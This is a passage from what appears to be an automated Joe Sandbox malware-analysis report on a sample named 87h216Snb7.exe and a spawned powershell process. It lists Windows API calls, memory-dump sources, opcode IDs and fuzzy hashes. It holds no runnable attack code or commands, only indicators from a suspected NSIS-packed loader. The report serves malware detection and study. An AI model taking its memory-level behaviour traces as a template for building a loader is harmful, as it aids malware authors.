                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                            • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                                                            • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                                                                                                                            • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                                                            • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                                                                                                                            APIs
                                                                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403509,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                                                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403509,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                                                                                                                                            Strings
                                                                                                                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E10
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                                            • API String ID: 2659869361-2382934351
                                                                                                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                            • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                                                                                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                            • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                                                                                                                                            APIs
                                                                                                                                                            • lstrlenA.KERNEL32(eksegeternes), ref: 004026BA
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                            • String ID: eksegeternes$lftninger\slangetmmerens
                                                                                                                                                            • API String ID: 1659193697-3935130602
                                                                                                                                                            • Opcode ID: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
                                                                                                                                                            • Instruction ID: a3276bd60f4d5d6bb2aa79b2f1cf5674750ecc9aad51c5d7eefbc562b3e224a1
                                                                                                                                                            • Opcode Fuzzy Hash: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
                                                                                                                                                            • Instruction Fuzzy Hash: 7B112B71A10211BBCB00BBB19E469AE3B61AF50348F20443FF402B61C1DAFD8851631E
                                                                                                                                                            APIs
                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040306F
                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                            • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                                                                                                            • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                                                                                                                            • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                                                                                                            • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                                                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405EC9
                                                                                                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                                                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                                                                                                            • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405F71
                                                                                                                                                            • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F81
                                                                                                                                                            Strings
                                                                                                                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F18
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                                            • API String ID: 3248276644-2382934351
                                                                                                                                                            • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                                                            • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                                                                                                                                            • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                                                            • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                                                                                                                                            APIs
                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00405569
                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                                                                                                                              • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                            • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                                                            • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                                                                                                                            • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                                                            • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403B9F
                                                                                                                                                            Strings
                                                                                                                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B7E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                                            • API String ID: 1100898210-2382934351
                                                                                                                                                            • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                                                            • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                                                                                                                                            • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                                                            • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                                                                                                                                            APIs
                                                                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
                                                                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CharPrevlstrlen
                                                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                                                            • API String ID: 2709904686-3976562730
                                                                                                                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                            • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                                                                                                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                            • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                                                                                                                                            APIs
                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                            • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                            • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                                                                                                                            • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                            • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.1530243227.000000000062D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0062D000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_62d000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: cdc711ff2450d505d32a85335fe16ba923d321e7897ca9fd6b6ce692f50602c2
                                                                                                                                                            • Instruction ID: 77c88d2e1f031c5b31b680ec6d907640354e4d658789285f05be3707c5091108
                                                                                                                                                            • Opcode Fuzzy Hash: cdc711ff2450d505d32a85335fe16ba923d321e7897ca9fd6b6ce692f50602c2
                                                                                                                                                            • Instruction Fuzzy Hash: E721ED72604600EFDB05DF10E9C4B26BB76FBA8314F24C6B9E9094A356C736D856CF62
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$Pib$Pib$tPq$tPq
                                                                                                                                                            • API String ID: 0-2441076465
                                                                                                                                                            • Opcode ID: 3e64b87cc3f1ae57038b0a49aa067bec630935267381112dea8692c17a48a600
                                                                                                                                                            • Instruction ID: 70d565ed456740f3e82e9264bc14a00f1a667ff9937f469b8a9dcf63420984db
                                                                                                                                                            • Opcode Fuzzy Hash: 3e64b87cc3f1ae57038b0a49aa067bec630935267381112dea8692c17a48a600
                                                                                                                                                            • Instruction Fuzzy Hash: 1532CF31F007148FEB54DF64D851BAABBA2AF89300F14C06AD905AF396DB31EC46CB91
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'q$4'q$Pib
                                                                                                                                                            • API String ID: 0-462079019
                                                                                                                                                            • Opcode ID: 6c42a7e5344dc8e7cf2432f30b3b62fe8cc04e052a58c6422a1880b6869d419e
                                                                                                                                                            • Instruction ID: 4f1cff2a1dde495f12fc0bdbb7f0c20dc493f0a607e0602d5f82e7bef7b47093
                                                                                                                                                            • Opcode Fuzzy Hash: 6c42a7e5344dc8e7cf2432f30b3b62fe8cc04e052a58c6422a1880b6869d419e
                                                                                                                                                            • Instruction Fuzzy Hash: 86B16874E006148FEB58CF54D550B9ABBB3AF88304F14C05AE909AF396DB76EC46CB91
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $q$$q$$q
                                                                                                                                                            • API String ID: 0-3067366958
                                                                                                                                                            • Opcode ID: ee762c2b97e7d131fa547695e01293218080baa65304725609a84f38bb7c8883
                                                                                                                                                            • Instruction ID: 255b4b1b740a89f7fd577ad1d3e49a95f503a62319f9fd6d00db2bc46163178d
                                                                                                                                                            • Opcode Fuzzy Hash: ee762c2b97e7d131fa547695e01293218080baa65304725609a84f38bb7c8883
                                                                                                                                                            • Instruction Fuzzy Hash: 54413B33F00219AFDB649A69A8406AEF7B1AF84610B14843BDC15E7344DB31DD05C7E5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $q$$q$$q
                                                                                                                                                            • API String ID: 0-3067366958
                                                                                                                                                            • Opcode ID: da862b91f6dd46b6c515b9a40aa0af6d94251c2bc3275eb7668a345b1f54b1fa
                                                                                                                                                            • Instruction ID: 917e8d6fd654cd42f572f0e0f4482285b66524e9f0a082cd01ab5ecd19691001
                                                                                                                                                            • Opcode Fuzzy Hash: da862b91f6dd46b6c515b9a40aa0af6d94251c2bc3275eb7668a345b1f54b1fa
                                                                                                                                                            • Instruction Fuzzy Hash: F7213B32B003515BEB749D69A841B37B6D6BBC0215F24843BED19CB386DD31D841E3A1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_6f70000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'q$4'q
                                                                                                                                                            • API String ID: 0-1467158625
                                                                                                                                                            • Opcode ID: 611e2c69b9eee5bd1420ab23ddc990ebe29199afe785fec7a30f6eda5e470b16
                                                                                                                                                            • Instruction ID: a06d52032bdcc8c515fcbbdeab350c54166981b23ac0e34a5844042c3007dba0
                                                                                                                                                            • Opcode Fuzzy Hash: 611e2c69b9eee5bd1420ab23ddc990ebe29199afe785fec7a30f6eda5e470b16
                                                                                                                                                            • Instruction Fuzzy Hash: CF325D74B102149FE754DF54C850B9ABBA3BB88314F14C099DA09AF382DB72ED86CF91
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.1537957206.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
